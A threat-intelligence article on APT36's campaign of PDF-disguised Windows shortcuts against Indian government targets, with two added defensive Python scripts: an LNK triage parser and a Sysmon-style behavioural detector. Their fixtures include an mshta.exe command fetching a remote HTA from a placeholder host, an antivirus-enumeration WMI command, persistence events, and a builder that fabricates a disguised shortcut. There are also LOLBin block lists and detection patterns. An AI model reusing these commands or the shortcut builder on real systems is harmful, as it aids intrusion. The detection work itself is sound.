Phantom Shortcuts: How APT36’s Disguised LNK Files Breached Indian Government Defenses
Subtitle: APT36’s new campaign leverages weaponized Windows shortcuts to infiltrate Indian systems, evade detection, and exfiltrate sensitive data.
It started with a seemingly innocent email: an exam notification, a familiar PDF name, a ZIP file attachment. But for targeted Indian government officials, this was no ordinary message - it was the opening move in a high-stakes game of cyber espionage. Behind the façade, hackers from the notorious APT36 group, linked to Pakistan, were orchestrating a silent breach, using cunning shortcuts to slip past digital defenses and into the heart of India’s sensitive networks.
Fast Facts
- APT36 is deploying oversized, malicious Windows LNK (shortcut) files disguised as PDFs to target Indian government entities.
- The attack uses “fileless” malware techniques, running payloads in memory to evade antivirus detection.
- Once inside, the malware enables full remote access, data theft, and surveillance, adapting its persistence methods based on detected security software.
- Exfiltrated data is encrypted and sent to external servers controlled by the attackers.
- Experts urge blocking LNK attachments at the mail gateway and restricting execution of mshta.exe (for example through application control policies) to counter this evolving threat.
Inside the Operation: From Click to Compromise
The latest investigation by CYFIRMA reveals a campaign as deceptive as it is sophisticated. APT36’s lure is a ZIP file titled “Online JLPT Exam Dec 2025.zip,” containing a Windows shortcut (LNK) file dressed up as a PDF. Because Explorer never displays the .lnk extension, a shortcut carrying a PDF name and icon is hard to tell apart from the document it imitates. At over 2 MB the file is orders of magnitude larger than a typical shortcut, which is a few kilobytes: the extra bulk is a real PDF embedded in the file, which gives the victim something plausible to look at and disarms suspicion. The real danger begins when the file is opened: the shortcut quietly launches the Windows tool mshta.exe, a legitimate host for HTML Applications, which fetches a hidden script from a compromised website.
This script runs silently, decrypting and executing multiple payloads directly in the victim’s computer memory - a “fileless” attack that leaves little on disk for file-based antivirus scanning to inspect. The chain culminates in the deployment of a remote access trojan (RAT), granting the attackers full control. The malware’s capabilities include running shell commands, capturing screenshots, monitoring the clipboard, managing files, and stealing sensitive documents, all while sending encrypted data to a remote command-and-control (C2) server.
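The two static tells the report highlights, an LNK far larger than any legitimate shortcut and a target of mshta.exe pointed at a remote script, can be checked before the file ever reaches a user. The following triage script is an added example written for this article, not CYFIRMA’s tooling or anything recovered from the campaign: it parses the Shell Link binary format (header, StringData, ExtraData) with the standard library, then flags the size, the double extension, the LOLBin target, the remote URL, a minimized window and a PDF appended after the shortcut structures. The sample shortcut it builds, its file name, the placeholder URL and the 64 KB size threshold are all constructed for the example.

```python
import re
import struct

# LinkFlags bits and header layout from the MS-SHLLINK (Shell Link Binary File Format) specification.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = (  # StringData fields appear in this fixed order, each only if its flag is set
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimized, hiding its window

# Assumed triage parameters (not from the report): benign shortcuts are a few KB, the campaign's
# file is over 2 MB, so anything above 64 KB is worth a look.
SIZE_THRESHOLD = 64 * 1024
LOLBINS = ("mshta", "powershell", "pwsh", "cmd", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec")
DOC_EXTENSIONS = r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png)\.lnk$"


def _read_string(buf, pos, unicode):
    """Read one StringData field: uint16 character count, then the characters (no terminator)."""
    (count,) = struct.unpack_from("<H", buf, pos)
    pos += 2
    nbytes = count * 2 if unicode else count
    raw = buf[pos:pos + nbytes]
    return raw.decode("utf-16-le" if unicode else "cp1252", errors="replace"), pos + nbytes


def parse_lnk(buf):
    """Parse the header, skip IDList/LinkInfo, read StringData, walk ExtraData; keep appended bytes."""
    if (len(buf) < LNK_HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != LNK_HEADER_SIZE
            or buf[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", buf, 20)
    (show_cmd,) = struct.unpack_from("<I", buf, 60)
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", buf, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", buf, pos)
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "show_cmd": show_cmd, "size": len(buf)}
    for bit, name in STRING_FIELDS:
        info[name], pos = _read_string(buf, pos, unicode) if flags & bit else ("", pos)
    # ExtraData: blocks prefixed by a uint32 size, ended by a TerminalBlock whose size is < 4.
    while pos + 4 <= len(buf):
        (block_size,) = struct.unpack_from("<I", buf, pos)
        if block_size < 4:
            pos += 4
            break
        if pos + block_size > len(buf):  # not a plausible block: treat the rest as appended data
            break
        pos += block_size
    info["appended"] = buf[pos:]
    return info


def triage(filename, buf):
    """Return a list of findings for one shortcut; an empty list means nothing stood out."""
    info = parse_lnk(buf)
    findings = []
    if info["size"] > SIZE_THRESHOLD:
        findings.append(f"oversized shortcut: {info['size']} bytes")
    if re.search(DOC_EXTENSIONS, filename, re.I):
        findings.append("double extension masquerading as a document")
    command = f"{info['relative_path']} {info['arguments']}".lower()
    for lolbin in LOLBINS:
        if re.search(rf'(^|[\\/ "]){lolbin}(\.exe)?\b', command):
            findings.append(f"launches LOLBin {lolbin}")
    if re.search(r"https?://", info["arguments"], re.I):
        findings.append("remote URL in arguments")
    if info["show_cmd"] == SW_SHOWMINNOACTIVE:
        findings.append("window hidden via SW_SHOWMINNOACTIVE")
    if b"%PDF-" in info["appended"]:
        findings.append("PDF payload appended after shortcut structures")
    return findings


def build_sample_lnk(relative_path, arguments, icon_location, show_cmd=1, appended=b""):
    """Construct a minimal Shell Link (header, StringData, TerminalBlock) plus optional appended bytes.
    Only used to fabricate test input here; real samples come from the mail gateway or disk."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_cmd)   # attributes, 3 timestamps, FileSize, IconIndex, ShowCommand
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))  # HotKey and reserved fields

    def field(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + field(relative_path) + field(arguments) + field(icon_location) + b"\x00" * 4 + appended


# Constructed samples modelled on the report's description (not the actual campaign files): a >2 MB
# shortcut named like a PDF (name assumed to mirror the ZIP) that runs mshta.exe against a remote HTA
# at a placeholder URL, with a real PDF appended; and an ordinary Notepad shortcut for comparison.
SUSPECT_NAME = "Online JLPT Exam Dec 2025.pdf.lnk"
SUSPECT_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\mshta.exe",
    "https://compromised-site.invalid/notice.hta",
    r"%SystemRoot%\System32\imageres.dll",
    show_cmd=SW_SHOWMINNOACTIVE,
    appended=b"%PDF-1.7\n" + b"\x00" * (2 * 1024 * 1024),
)
BENIGN_NAME = "Notepad.lnk"
BENIGN_LNK = build_sample_lnk(r"..\..\..\Windows\System32\notepad.exe", "", r"%SystemRoot%\System32\notepad.exe")

if __name__ == "__main__":
    for name, blob in ((SUSPECT_NAME, SUSPECT_LNK), (BENIGN_NAME, BENIGN_LNK)):
        print(name, "->", triage(name, blob) or ["clean"])
```

Run the script to see the suspect shortcut produce six findings and the Notepad shortcut none. At a mail gateway the same `triage()` can be applied to every `.lnk` inside an archive; the size check alone would have caught the campaign’s 2 MB file, and the LOLBin check does not depend on the attacker keeping the same URL.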
Adaptive and Persistent: Outsmarting Security
APT36’s toolkit is engineered for stealth and longevity. The malware probes the infected system for installed antivirus products using Windows Management Instrumentation (WMI) and chooses its persistence method accordingly. If Kaspersky is detected, the payload is hidden in public folders and re-launched at startup via shortcuts. With other security tools such as Quick Heal or Avast, it switches tactics, using batch scripts or registry entries for persistence. Decoy PDFs and backup payloads keep the attack going even if the initial method fails.
All exfiltrated data is Base64-encoded and AES-encrypted, so anyone inspecting the traffic sees only opaque ciphertext. The attackers’ infrastructure includes multiple fallback servers and domains, which makes takedown efforts harder.
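Because every stage described above runs through legitimate Windows binaries, the defender’s signal is behavioural: mshta.exe spawned by Explorer with a URL on its command line, a WMI query against the SecurityCenter2 antivirus classes, and persistence dropped into the Startup folder or a Run key. The detector below is an added example for this article, not CYFIRMA’s content or a published rule set: it runs a handful of such rules over Sysmon-style process-creation (ID 1), file-creation (ID 11) and registry (ID 13) events. The events are constructed JSON lines that model the chain described in this and the previous section, and the hostnames, paths and user names in them are placeholders rather than indicators from the report.

```python
import json
import re
from ntpath import basename

# Constructed Sysmon-style events (JSON lines), modelling the chain the report describes: Explorer
# launches mshta.exe against a remote HTA, the script enumerates antivirus products over WMI, then
# persists through a Startup-folder shortcut and a Run key pointing into a public folder. Two benign
# events (Notepad, a Teams shortcut written by Explorer) are included to show the rules stay quiet.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\mshta.exe\" https://compromised-site.invalid/notice.hta"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "ParentImage": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName"}
{"EventID": 11, "Image": "C:\\Windows\\System32\\mshta.exe", "TargetFilename": "C:\\Users\\analyst\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Update.lnk"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\mshta.exe", "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update", "Details": "C:\\Users\\Public\\update.bat"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\notepad.exe\" C:\\Users\\analyst\\notes.txt"}
{"EventID": 11, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\analyst\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Teams.lnk"}
"""

# Script hosts that Explorer should rarely launch straight from a double-click on a user file.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\.+\.(lnk|bat|cmd|vbs|js|hta)$", re.I)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\", re.I)
SCRIPTY_VALUE_RE = re.compile(r"\\users\\public\\|\.(bat|cmd|vbs|js|hta|ps1)\b|mshta|powershell", re.I)
URL_RE = re.compile(r"https?://", re.I)
AV_PROBE_RE = re.compile(r"securitycenter2|antivirusproduct", re.I)


def image(event):
    """Lower-cased file name of the acting process (ntpath handles Windows paths on any OS)."""
    return basename(event.get("Image", "")).lower()


def parent(event):
    return basename(event.get("ParentImage", "")).lower()


RULES = (
    # (rule name, Sysmon EventID it applies to, predicate over one parsed event)
    ("mshta.exe launched with a remote URL", 1,
     lambda e: image(e) == "mshta.exe" and URL_RE.search(e.get("CommandLine", ""))),
    ("script host spawned directly by Explorer (shortcut double-click)", 1,
     lambda e: image(e) in SCRIPT_HOSTS and parent(e) == "explorer.exe"),
    ("antivirus enumeration via WMI SecurityCenter2", 1,
     lambda e: AV_PROBE_RE.search(e.get("CommandLine", ""))),
    ("Startup-folder shortcut written by a script host", 11,
     lambda e: image(e) in SCRIPT_HOSTS and STARTUP_RE.search(e.get("TargetFilename", ""))),
    ("Run key pointing at a script or a public folder", 13,
     lambda e: RUN_KEY_RE.search(e.get("TargetObject", "")) and SCRIPTY_VALUE_RE.search(e.get("Details", ""))),
)


def detect(jsonl):
    """Run every rule over every event; return (event index, rule name) pairs in log order."""
    hits = []
    for idx, line in enumerate(l for l in jsonl.splitlines() if l.strip()):
        event = json.loads(line)
        for name, event_id, predicate in RULES:
            if event["EventID"] == event_id and predicate(event):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The first two rules fire on the same event, which is the strongest signal here: the article’s recommendation to restrict mshta.exe is what turns that detection into prevention. The WMI rule is deliberately loose, since the AV probe can be issued from wmic.exe, PowerShell or script code alike; in production you would tune it against your own baseline of software inventory tools that legitimately query SecurityCenter2.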
The Bigger Picture
This campaign signals a new level of sophistication from APT36, which has shifted from basic phishing to advanced, environment-aware attacks. The use of “living-off-the-land” tactics - leveraging legitimate Windows tools for malicious purposes - underscores the difficulty in detecting such threats. With espionage, not financial gain, as the motive, the stakes are high for Indian government, defense, and academic institutions.
Conclusion
APT36’s shortcut-based espionage is a wake-up call: even the most familiar files can be weaponized, and adversaries are growing bolder and more adaptive. For defenders, vigilance, behavioral monitoring, and proactive restrictions on risky file types and tools are now essential. In the digital shadows, the shortcut to compromise is just a click away.
WIKICROOK
- APT (Advanced Persistent Threat): An Advanced Persistent Threat (APT) is a long-term, targeted cyberattack by skilled groups, often state-backed, aiming to steal data or disrupt operations.
- LNK File: An LNK file is a Windows shortcut that links to a file or program. Attackers can exploit LNK files to run hidden commands or malware.
- Fileless Malware: Fileless malware is malicious software that runs in a computer’s memory, avoiding disk storage and making it difficult for traditional security tools to detect.
- Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
- Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.